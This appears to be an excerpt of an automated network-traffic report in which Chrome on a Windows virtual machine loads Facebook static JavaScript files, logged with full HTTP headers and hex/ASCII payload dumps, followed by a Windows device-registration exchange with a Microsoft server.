                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: a5N7LjU0LqOqa0IWOh0OgA==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 22:11:41 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: OS4yGe0HcuuImv0QuG04G3QEo3sBRVvVvnfxzugCEZmlbAI+YDBiwHnVIzHOT9vzZKlrur0mYOIgaLv43ET7XQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:21 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=7, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10762
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC10761INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 75 74 74 6f 6e 22 2c 5b 22 63 73 78 22 2c 22 63 78 22 2c 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 2c 22 69 73 4e 6f 64 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 22 75 69 42 75 74 74 6f 6e 44 69 73 61 62 6c 65 64 22 2c 6c 3d 22 75 69 42 75 74 74 6f 6e 44 65 70 72 65 73 73 65 64 22 2c 6d 3d 22 5f 34 32 66 72 22 2c 6e 3d 22 5f 34 32 66 73 22 2c 6f 3d 22 62 75 74 74 6f 6e 3a 62 6c 6f 63 6b 65 72 22 2c 70 3d 22 68 72 65 66 22 2c 71 3d 22 61 6a 61 78
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Button",["csx","cx","invariant","CSS","DOM","DataStore","Event","Parent","emptyFunction","isNode"],(function(a,b,c,d,e,f,g,h,i,j){var k="uiButtonDisabled",l="uiButtonDepressed",m="_42fr",n="_42fs",o="button:blocker",p="href",q="ajax


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  65192.168.2.649789157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC581OUTGET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: +0ZQ6CpaMkkPWx1LhVlM1w==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 20:39:53 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: VM4lZ9pAdk+fp+/62ZtZjVIHAJs/b0RFaunLmNX+6vXuxRNwIZHsttsLpqifMTIf6NxEdc0ssqKg6/5GJa39IQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:21 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=103, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10849
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC10848INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 61 4a 6f 65 53 48 6e 37 58 63 4e 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 62 6c 61 6b 65 6a 73 2d 31 2e 31 2e 30 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 22 49 6e 70 75 74 20 6d 75 73 74 20 62 65 20 61 6e 20 73 74 72 69 6e 67 2c 20 42 75 66 66 65 72 20 6f 72 20 55 69 6e 74 38 41 72 72 61 79 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/ */__d("blakejs-1.1.0",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a="Input must be an string, Buffer or Uint8Array";function b(b){va


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  66192.168.2.649795157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC581OUTGET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: xM0p4JC4uzf0Tq5z3PsKvA==
                                                                                                                                                                                                                                  Expires: Tue, 23 Sep 2025 18:22:43 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 0gxglF8xyTmIydkbm9D7FtxlRIgg2DURwTE+wJAcZVDFkHXo6pJGUDPyHsSFaaqPXJUUt6nthdhsVu1AoVY3iQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:22 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 6156
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC6155INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 5b 22 24 22 2c 22 44 61 74 61 53 74 6f 72 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 72 6f 6f 74 3d 62 28 22 24 22 29 2e 66 72 6f 6d 49 44 4f 72 45 6c 65 6d 65 6e 74 28 61 29 2c 74 68 69 73 2e 75 70 64 61 74 69 6e 67 3d 21 31 2c 62 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 73 65 74 28 61 2c 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 74 68 69 73 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 63 2e 67 65 74 52 6f 6f 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  67192.168.2.649796157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC374OUTGET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: MNmf+dATD/FezUb5xIFrpg==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 19:06:04 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 7TVPOiBcIgAp4qhjjFiT3k0/PMvELTdLXLSLQgsEAN9XoECggBTibHEWFE1IeLbnCTxmfCbFvtHr7KlZd1Puug==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:22 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 45002
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 22 2c 5b 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 22 55 52 49 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 68 7c 7c 28 68 3d 63 28 22 55 52 49 22 29 29 29 28 61 29 2e 61 64 64 51 75 65 72 79 44 61 74 61 28 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 2c 62 29 7d 67 2e 63 72 65 61 74 65 3d 61 3b 67 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3d 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 7d 29 2c
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 2e 66 6c 61 74 74 65 6e 54 6f 41 72 72 61 79 28 29 3a 61 7d 29 2c 64 3d 62 28 22 66 6c 61 74 74 65 6e 41 72 72 61 79 22 29 28 64 29 29 3b 72 65 74 75 72 6e 20 62 28 22 63 72 3a 36 31 31 34 22 29 2e 63 72 65 61 74 65 28 61 2c 63 2c 64 29 7d 3b 67 5b 61 5d 3d 63 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 67 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 5b 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 72 65 6d 6f 76 65 46 72 6f 6d 41 72 72 61 79 22 2c 22 74 72 61 63 6b 52 65 66 65 72 72 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 40 40 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 69 3d 5b 5d 2c 6a 3d 5b
                                                                                                                                                                                                                                  Data Ascii: .flattenToArray():a}),d=b("flattenArray")(d));return b("cr:6114").create(a,c,d)};g[a]=c});e.exports=g}),null);__d("LinkController",["DataStore","Event","Parent","removeFromArray","trackReferrer"],(function(a,b,c,d,e,f,g){var h="@@LinkController",i=[],j=[
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC12746INData Raw: 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 3b 77 68 69 6c 65 28 61 29 7b 76 61 72 20 65 3d 64 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 67 65 74 28 61 2c 22 74 6f 67 67 6c 65 72 22 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 3b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 69 66 28 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28 61 2c 22 75 69 54 6f 67 67 6c 65 43 6f 6e 74 65 78 74 22 29 29 72 65 74 75 72 6e 20 62 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 61 29 3b 65 6c 73 65 20 69 66 28 21 63 28 22 6b 69 6c 6c 73 77 69 74 63 68 22 29 28 22 4a 45 57 45 4c 5f 54 4f 47 47 4c 45 52 5f 49 4e 53 54 41 4e 43 45 5f 46 49 58 45 53 22 29 26 26 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28
                                                                                                                                                                                                                                  Data Ascii: Instance=function(a){a=a;while(a){var e=d("DataStore").get(a,"toggler");if(e)return e;if(a instanceof Element)if(d("CSS").hasClass(a,"uiToggleContext"))return b.createInstance(a);else if(!c("killswitch")("JEWEL_TOGGLER_INSTANCE_FIXES")&&d("CSS").hasClass(


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                  68192.168.2.64979040.113.110.67443
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 75 35 39 46 6c 6e 37 34 69 55 79 4b 46 79 42 58 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 37 38 39 31 61 34 37 33 37 33 31 35 38 38 62 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: u59Fln74iUyKFyBX.1Context: e7891a473731588b
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 35 39 46 6c 6e 37 34 69 55 79 4b 46 79 42 58 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 37 38 39 31 61 34 37 33 37 33 31 35 38 38 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 58 45 6e 39 66 4d 54 56 31 48 4f 6b 36 78 5a 54 34 63 69 4f 74 44 64 41 52 42 4d 77 35 50 31 67 42 55 46 44 32 42 72 39 67 64 6b 6b 33 4f 44 32 67 4f 59 6b 6c 36 6d 70 4d 58 6e 57 54 70 45 39 73 4d 73 4d 74 57 39 53 54 67 76 76 2b 42 39 55 4c 55 66 45 37 76 34 41 67 31 39 6d 78 6a 2b 70 4d 43 70 69 67 69 4e 45 63 67 4a 57
                                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: u59Fln74iUyKFyBX.2Context: e7891a473731588b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaXEn9fMTV1HOk6xZT4ciOtDdARBMw5P1gBUFD2Br9gdkk3OD2gOYkl6mpMXnWTpE9sMsMtW9STgvv+B9ULUfE7v4Ag19mxj+pMCpigiNEcgJW
